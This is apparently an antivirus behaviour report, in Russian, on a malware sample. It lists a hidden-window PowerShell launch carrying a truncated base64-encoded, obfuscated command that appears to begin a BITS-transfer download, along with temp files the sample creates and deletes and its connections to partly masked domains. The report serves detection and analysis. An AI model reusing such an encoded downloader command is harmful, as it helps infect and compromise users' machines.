Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e LgAoACcASQBtAHAAJwArACcAbwAnACsAJwByAHQALQAnACsAJwBNACcAKwAnAG8AZAB1AGwAZQAnACkAIABCAEkAdABzAFQAUgBBAG4AcwBGAGUAUgA7ACQAZwBhAGkAdgB5AG8AZwBnAGkAZQBrAGQAbwBqAHgAYQB1AG0AbABvAGEAbQA9ACcAaAB0AH...
Изменения в файловой системе
Создает следующие файлы
- %WINDIR%\temp\cab4ed5.tmp
- %WINDIR%\temp\tar4ed6.tmp
- %WINDIR%\temp\cab7ac9.tmp
- %WINDIR%\temp\tar7aca.tmp
- %WINDIR%\temp\cab7bb6.tmp
- %WINDIR%\temp\tar7bb7.tmp
- %WINDIR%\temp\cab9105.tmp
- %WINDIR%\temp\tar9106.tmp
Удаляет следующие файлы
- %WINDIR%\temp\cab4ed5.tmp
- %WINDIR%\temp\tar4ed6.tmp
- %WINDIR%\temp\cab7ac9.tmp
- %WINDIR%\temp\tar7aca.tmp
- %WINDIR%\temp\cab7bb6.tmp
- %WINDIR%\temp\tar7bb7.tmp
- %WINDIR%\temp\cab9105.tmp
- %WINDIR%\temp\tar9106.tmp
Сетевая активность
Подключается к
- 'sh####nfoways.com':80
- 'te###.cxyw.net':80
- 'su########eandorganicgarments.com':80
- 'p3###########.shr.prod.phx3.secureserver.net':80
- 'st####g.icuskin.com':80
TCP
- 'ra####kaonline.com':443
UDP
- DNS ASK ra####kaonline.com
- DNS ASK sh####nfoways.com
- DNS ASK te###.cxyw.net
- DNS ASK su########eandorganicgarments.com
- DNS ASK p3###########.shr.prod.phx3.secureserver.net
- DNS ASK st####g.icuskin.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e LgAoACcASQBtAHAAJwArACcAbwAnACsAJwByAHQALQAnACsAJwBNACcAKwAnAG8AZAB1AGwAZQAnACkAIABCAEkAdABzAFQAUgBBAG4AcwBGAGUAUgA7ACQAZwBhAGkAdgB5AG8AZwBnAGkAZQBrAGQAbwBqAHgAYQB1AG0AbABvAGEAbQA9ACcAaAB0AH...' (со скрытым окном)
